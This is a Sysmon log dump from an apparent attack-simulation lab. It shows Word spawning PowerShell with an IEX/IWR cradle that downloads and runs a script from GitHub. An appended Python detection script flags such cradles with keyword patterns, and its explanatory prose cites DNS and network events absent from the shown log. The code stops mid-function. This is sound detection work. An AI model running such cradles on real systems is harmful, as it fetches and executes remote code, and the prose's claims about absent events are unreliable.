17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x80000000000000001530439Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x80000000000000001530438Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001530437Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x80000000000000001530436Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001530435Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x80000000000000001530434Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\windows.storage.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=902EBA937960538CA5B7A586EAFE47EE,SHA256=0C5D100EFA1E51C36C0A6E4B35BFD09C3098616EE9B3E46DC49E9E1A8365A0DFtrueMicrosoft WindowsValid 734700x80000000000000001530433Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 13241300x80000000000000001530432Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
17:30:15.601{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530431Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.601{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 10341000x80000000000000001530430Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530429Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\shell32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=E6D716FCDD7A5E7897267CDCED7D3EA3,SHA256=763990AA9286C3D945B6F0D617D3EB22CE88804AC3847F27A90509F813D77FD3trueMicrosoft 
WindowsValid 10341000x80000000000000001530428Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}54245416C:\Windows\system32\conhost.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530427Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x80000000000000001530426Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001530425Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValid 
734700x80000000000000001530424Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001530423Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001530422Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x80000000000000001530421Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 
734700x80000000000000001530420Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001530419Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001530418Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001530417Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 
734700x80000000000000001530416Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001530415Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001530414Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001530413Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\ConhostV2.dll10.0.14393.1198 (rs1_release_sec.170427-1353)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXEMD5=C16CC61A395D046B4294C92F7C1FD0C2,SHA256=6B5240C0D6F5C1E87A7713CAB668FA9DB0E54492441979ACBD7EA9323724C1B8trueMicrosoft WindowsValid 
734700x80000000000000001530412Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 10341000x80000000000000001530411Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-84C5-607D-E100-00000000BB01}32203160C:\Windows\system32\csrss.exe{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 734700x80000000000000001530410Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001530409Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 
734700x80000000000000001530408Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001530407Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXEMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0trueMicrosoft WindowsValid 154100x80000000000000001530406Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.595{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-5\Administrator{21761711-84C7-607D-C8E0-090000000000}0x9e0c82HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1') 734700x80000000000000001530405Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.585{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001530404Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001530403Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001530402Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436trueMicrosoft WindowsValid 
10341000x80000000000000001530401Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-84C5-607D-E100-00000000BB01}32203160C:\Windows\system32\csrss.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001530400Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.585{21761711-4F27-6080-8D5B-00000000BB01}56247944C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+43ae7|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+4358a|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+44642|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3c560|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3d357|C:\Windows\System32\windows.storage.dll+16e69f|C:\Windows\System32\windows.storage.dll+16e315|C:\Windows\System32\windows.storage.dll+16de06|C:\Windows\System32\windows.storage.dll+16f278|C:\Windows\System32\windows.storage.dll+16dc2e|C:\Windows\System32\windows.storage.dll+fd025|C:\Windows\System32\windows.storage.dll+fd3a4|C:\Windows\System32\windows.storage.dll+fc9e0|C:\Windows\System32\SHELL32.dll+3cd0f|C:\Windows\System32\SHELL32.dll+3cb9c|C:\Windows\System32\SHELL32.dll+dcb5e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
154100x80000000000000001530399Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.592{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1')C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\WIN-HOST-5\Administrator{21761711-84C7-607D-C8E0-090000000000}0x9e0c82HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "C:\Users\Administrator\Desktop\cs_doc1_rundll32.dotm 12241200x80000000000000001530398Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.585{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders 12241200x80000000000000001530397Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.585{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders 12241200x80000000000000001530396Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.585{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 
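The process-creation event above (Sysmon EventID 1) is the pivot of this capture: WINWORD.EXE, opened on the macro-enabled template cs_doc1_rundll32.dotm, starts powershell.exe with an IEX(IWR ...) download cradle, and the same process then produces the DNS query for raw.githubusercontent.com (EventID 22) and the TCP connection to 185.199.111.133:443 (EventID 3) seen a few events later. The following is an added detection example, not part of this Attack Range dump or of the Splunk/Atomic Red Team tooling it came from. It assumes Sysmon's field names (the flattened dump carries none), constructs its sample events by hand from values visible in the dump, and generalises beyond what the dump shows by treating any Office host and several script hosts as the suspicious parent/child pair; that list is an assumption. It also handles one quirk the dump does show: the EventID 3 connection for PID 1572 was logged with an all-zero ProcessGuid and an Image of `<unknown process>`, so correlating follow-on events by ProcessGuid alone would miss it.

```python
"""Detect an Office-spawned PowerShell download cradle in Sysmon events.

Added example; not part of the log dump above. Sample events are
constructed from values visible in the dump and use Sysmon's field
names, which the flattened dump does not carry (an assumption).
"""
import re
from datetime import datetime

# Assumption: any Office host is a suspicious parent for a shell, not just WINWORD.EXE.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# IEX/Invoke-Expression and a web fetch in the same command line, in either order.
FETCH = r"(iwr|invoke-webrequest|downloadstring|net\.webclient|curl|wget)"
CRADLE_RE = re.compile(
    rf"\b(iex|invoke-expression)\b.*?\b{FETCH}\b|\b{FETCH}\b.*?\b(iex|invoke-expression)\b",
    re.IGNORECASE | re.DOTALL,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
NULL_GUID = "{00000000-0000-0000-0000-000000000000}"


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ts(ev: dict) -> datetime:
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def is_office_spawned_cradle(ev: dict) -> bool:
    """EventID 1 where an Office host starts a shell whose command line fetches and evals code."""
    return (
        ev.get("EventID") == 1
        and basename(ev.get("ParentImage", "")) in OFFICE_PARENTS
        and basename(ev.get("Image", "")) in SHELLS
        and CRADLE_RE.search(ev.get("CommandLine", "")) is not None
    )


def same_process(child: dict, ev: dict, window_seconds: float) -> bool:
    """Tie a follow-on event (DNS, network) to the flagged process.

    Sysmon can log a network connection before it has resolved the owning
    process; the event then carries an all-zero ProcessGuid and the image
    '<unknown process>' (the dump shows this for PID 1572). Fall back to
    ProcessId inside a short window, because PIDs are reused.
    """
    if ev.get("ProcessGuid") not in (None, "", NULL_GUID):
        return ev["ProcessGuid"] == child["ProcessGuid"]
    return ev.get("ProcessId") == child.get("ProcessId") and \
        abs((ts(ev) - ts(child)).total_seconds()) <= window_seconds


def detect(events: list, window_seconds: float = 60) -> list:
    """One alert per Office-spawned cradle, with the DNS and network events it produced."""
    alerts = []
    for ev in events:
        if not is_office_spawned_cradle(ev):
            continue
        alerts.append({
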